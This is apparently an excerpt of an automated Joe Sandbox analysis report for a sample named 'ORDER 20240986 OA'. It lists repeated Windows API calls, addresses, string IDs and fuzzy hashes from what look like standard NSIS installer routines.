                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                                  • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                  • Instruction ID: 595a5ac3551c8926a474018cd00e052a0643935c19338169816fcf7950983a94
                                                                                                                                                  • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                  • Instruction Fuzzy Hash: BD2135716007049FCB219F68DD48B5BBBF8AF81715B048A3EED96A26E0D734E944CB54
                                                                                                                                                  APIs
                                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
                                                                                                                                                    • Part of subcall function 00405E6E: SetFilePointer.KERNEL32(?,00000000,00000000,?,?,00000000,?,?,0040262F,00000000,00000000,?,00000000,00000011), ref: 00405E84
                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                  • String ID: 9
                                                                                                                                                  • API String ID: 163830602-2366072709
                                                                                                                                                  • Opcode ID: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
                                                                                                                                                  • Instruction ID: 60624729709df044e3b9a276a2138f1bd207bb457e97f94edfd4483e5cf9eee0
                                                                                                                                                  • Opcode Fuzzy Hash: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
                                                                                                                                                  • Instruction Fuzzy Hash: 61510974D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D0DBB89982CB58
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CountTick$wsprintf
                                                                                                                                                  • String ID: ... %d%%$5
                                                                                                                                                  • API String ID: 551687249-3328568109
                                                                                                                                                  • Opcode ID: 2b12612690519de3068172d76ec2280cdcede413f29547579ccd35042eb19dae
                                                                                                                                                  • Instruction ID: 82e96eed204572331df772a9dc06b49ed9c909a247c3debab706571384c66a49
                                                                                                                                                  • Opcode Fuzzy Hash: 2b12612690519de3068172d76ec2280cdcede413f29547579ccd35042eb19dae
                                                                                                                                                  • Instruction Fuzzy Hash: 7841B171900209DBCB10DFA5DA84B9E7FB8AF44356F1442BBE915B72D0C7788B50CB99
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenW.KERNEL32(007A0F00), ref: 00405337
                                                                                                                                                  • lstrlenW.KERNEL32(?,007A0F00), ref: 00405347
                                                                                                                                                  • lstrcatW.KERNEL32(007A0F00,?,?,007A0F00), ref: 0040535A
                                                                                                                                                  • SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2531174081-0
                                                                                                                                                  • Opcode ID: f9f97bae3afdd1c4f1ca6782e82fa35db0496c66d131c2d1178b0595b913afc0
                                                                                                                                                  • Instruction ID: 8b92f55a8d4b67b8ae829402156b3fb25f72412c241cd3f1eea2d9b1658803e5
                                                                                                                                                  • Opcode Fuzzy Hash: f9f97bae3afdd1c4f1ca6782e82fa35db0496c66d131c2d1178b0595b913afc0
                                                                                                                                                  • Instruction Fuzzy Hash: 66216071900618BACB11AFA5DD859CFBF78EF85350F10846AF904B62A0C7B94A50CF98
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BE4
                                                                                                                                                  • GetMessagePos.USER32 ref: 00404BEC
                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404C06
                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C18
                                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C3E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                                  • String ID: f
                                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                                  • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                  • Instruction ID: e2d68be7770c43893e1e2478522bb0d44a2fa382b0b36792216c84cf33d7cb12
                                                                                                                                                  • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                  • Instruction Fuzzy Hash: 6F015E71D00218BAEB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A018BA4
                                                                                                                                                  APIs
                                                                                                                                                  • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
                                                                                                                                                  • MulDiv.KERNEL32(?,00000064,?), ref: 00402E3C
                                                                                                                                                  • wsprintfW.USER32 ref: 00402E4C
                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                                                                                  Strings
                                                                                                                                                  • verifying installer: %d%%, xrefs: 00402E46
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                  • String ID: verifying installer: %d%%
                                                                                                                                                  • API String ID: 1451636040-82062127
                                                                                                                                                  • Opcode ID: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                                                                                                  • Instruction ID: 3b7df5e00b9d055b55134e233a6447c2e1405f162d6c23549fa63679cea1b34f
                                                                                                                                                  • Opcode Fuzzy Hash: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                                                                                                  • Instruction Fuzzy Hash: 5601677164020CBFDF109F50DD49FAE3B69AB04305F108439FA05B51E0DBB98555CF58
                                                                                                                                                  APIs
                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                                                                                                  • wsprintfW.USER32 ref: 00406653
                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                  • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                  • API String ID: 2200240437-1946221925
                                                                                                                                                  • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                  • Instruction ID: 65f2176863960af248fb2a7cbd18121a9a3b282edca47cb762b3bdaa43f9a997
                                                                                                                                                  • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                  • Instruction Fuzzy Hash: 14F0217050121967CB10AB68DD0DFDB376CA700304F10447AB547F10D1EBBDDA65CB98
                                                                                                                                                  APIs
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2667972263-0
                                                                                                                                                  • Opcode ID: 550d24ea38cda2d92e74c1bb79bc0c47b539332056a7156cf0f117270c7474f2
                                                                                                                                                  • Instruction ID: 9b62f472eb3a95df078ad497759be9c31f6c15c11f60cf08f6005a6c9cb4e6e4
                                                                                                                                                  • Opcode Fuzzy Hash: 550d24ea38cda2d92e74c1bb79bc0c47b539332056a7156cf0f117270c7474f2
                                                                                                                                                  • Instruction Fuzzy Hash: 9921BFB1C00128BBCF116FA5DE49D9E7E79EF09364F14423AF960762E0CB794C419B98
                                                                                                                                                  APIs
                                                                                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,007B5800,007B5800,007B3000,00403347,007B5800,74DF3420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                                                                                                  • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                                                                                                  • CharNextW.USER32(?,00000000,007B5800,007B5800,007B3000,00403347,007B5800,74DF3420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                                                                  • CharPrevW.USER32(?,?,007B5800,007B5800,007B3000,00403347,007B5800,74DF3420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                                  • String ID: *?|<>/":
                                                                                                                                                  • API String ID: 589700163-165019052
                                                                                                                                                  • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                  • Instruction ID: 354a4add7e9ac5ce680480da4fd3ed99b8030fd96c8c1ffbe99f836226306b46
                                                                                                                                                  • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                  • Instruction Fuzzy Hash: 4511B655800612A5DF303B14AD44A7772F8EF547A0F56443FE985733C4E77C5C9286AD
                                                                                                                                                  APIs
                                                                                                                                                  • CharNextW.USER32(?,?,?,?,004015D1,00000000,000000F0), ref: 00405C25
                                                                                                                                                  • CharNextW.USER32(00000000,?,?,?,004015D1,00000000,000000F0), ref: 00405C2A
                                                                                                                                                  • CharNextW.USER32(00000000,?,?,?,004015D1,00000000,000000F0), ref: 00405C42
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CharNext
                                                                                                                                                  • String ID: :$\
                                                                                                                                                  • API String ID: 3213498283-1166558509
                                                                                                                                                  • Opcode ID: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                                                                                                  • Instruction ID: 6a9d977fbe5713998eb834b7ad01fe533960ca492682b5c2b36711c34b001c28
                                                                                                                                                  • Opcode Fuzzy Hash: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                                                                                                  • Instruction Fuzzy Hash: DDF0F061808B1095FB3176644C88E7B66BCEB55360B04803BE641B72C0D3B84DC18EAA
                                                                                                                                                  APIs
                                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000,0040A5A8,007B4000,?,?,00000031), ref: 004017B0
                                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,0040A5A8,0040A5A8,00000000,00000000,0040A5A8,007B4000,?,?,00000031), ref: 004017D5
                                                                                                                                                    • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                                                                                                    • Part of subcall function 004052FF: lstrlenW.KERNEL32(007A0F00), ref: 00405337
                                                                                                                                                    • Part of subcall function 004052FF: lstrlenW.KERNEL32(?,007A0F00), ref: 00405347
                                                                                                                                                    • Part of subcall function 004052FF: lstrcatW.KERNEL32(007A0F00,?,?,007A0F00), ref: 0040535A
                                                                                                                                                    • Part of subcall function 004052FF: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
                                                                                                                                                    • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                                                                                                    • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                                                                                                    • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1941528284-0
                                                                                                                                                  • Opcode ID: 58fdc18d76f7bcf16c6fce6c3f21aaeb4e3bf1edbc87f50fc288292bb51d9b5e
                                                                                                                                                  • Instruction ID: 2a95d3c8b727dc51f4ea131d05094547f585338353aa12d45a2270be549af1c7
                                                                                                                                                  • Opcode Fuzzy Hash: 58fdc18d76f7bcf16c6fce6c3f21aaeb4e3bf1edbc87f50fc288292bb51d9b5e
                                                                                                                                                  • Instruction Fuzzy Hash: C141B471910514BACF107BA5DD45DAF3A79EF45328B20823FF512B10E1DB3C4A519B6E
                                                                                                                                                  APIs
                                                                                                                                                  • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                                  • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3808545654-0
                                                                                                                                                  • Opcode ID: 2e8c6812557a8000d290618689d5c167272f7de43d41522ca2a47e16c60e8740
                                                                                                                                                  • Instruction ID: 8812a6a15301a194985102fbed33e50eefbd915e65da34b8167a76c641a3bf07
                                                                                                                                                  • Opcode Fuzzy Hash: 2e8c6812557a8000d290618689d5c167272f7de43d41522ca2a47e16c60e8740
                                                                                                                                                  • Instruction Fuzzy Hash: 1B017571948240EFE7406BB4AF8A7D97FB49F95301F10457EE241B71E2CA7804459F2D
                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                                  • Opcode ID: 2a08160353212a6e5352d7991a9f72d4257b9bf0db71b279ef6b12194f0acfdb
                                                                                                                                                  • Instruction ID: 7e4da700d615158f321032e6dee441e0afa22e46251462cde10931eea5e4b44d
                                                                                                                                                  • Opcode Fuzzy Hash: 2a08160353212a6e5352d7991a9f72d4257b9bf0db71b279ef6b12194f0acfdb
                                                                                                                                                  • Instruction Fuzzy Hash: 59F0EC72A04518AFDB41DBE4DE88CEEB7BCEB48301B14446AF641F61A0CA749D519B38
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                                  • String ID: !
                                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                                  • Opcode ID: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                                                                                                  • Instruction ID: 5915ba61491c244e76e1eaab0aa102c6a5e0f3d841db56a12d121f6c77e1b82d
                                                                                                                                                  • Opcode Fuzzy Hash: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                                                                                                  • Instruction Fuzzy Hash: E621C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605F61D0D7B889409B18
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                                                                                                  • wsprintfW.USER32 ref: 00404B65
                                                                                                                                                  • SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                  • String ID: %u.%u%s%s
                                                                                                                                                  • API String ID: 3540041739-3551169577
                                                                                                                                                  • Opcode ID: 659e19d517a3b0c3334d5d290c3650de3f4e6e8c213cad244c2b0995072c2ab2
                                                                                                                                                  • Instruction ID: c6a8333de7f2a0e63f9e82a7fb0d3590b97a2c0368f8d4fe0eecd184368e2ceb
                                                                                                                                                  • Opcode Fuzzy Hash: 659e19d517a3b0c3334d5d290c3650de3f4e6e8c213cad244c2b0995072c2ab2
